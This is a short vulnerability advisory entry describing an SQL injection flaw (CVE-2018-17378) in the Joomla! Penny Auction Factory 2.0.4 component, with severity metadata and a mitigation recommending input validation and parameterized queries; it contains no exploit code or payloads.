vendor: Penny Auction Factory
by: Ihsan Sencan
CVSS: 9.8 CRITICAL
SQL Injection
CWE: 89
Product Name: Penny Auction Factory
Affected Version From: 2.0.4
Affected Version To: 2.0.4
Patch Exists: YES
Related CVE: CVE-2018-17378
CPE: a:thephpfactory:penny_auction_factory:2.0.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018
Joomla! Component Penny Auction Factory 2.0.4 – SQL Injection
A SQL injection vulnerability exists in Joomla! Component Penny Auction Factory 2.0.4. An attacker can send a specially crafted HTTP request to the vulnerable application to execute arbitrary SQL commands in the application's database. This can be exploited to manipulate or disclose arbitrary data from the database.
Mitigation:
The application should validate input and use parameterized queries (also known as prepared statements) to prevent SQL injection attacks.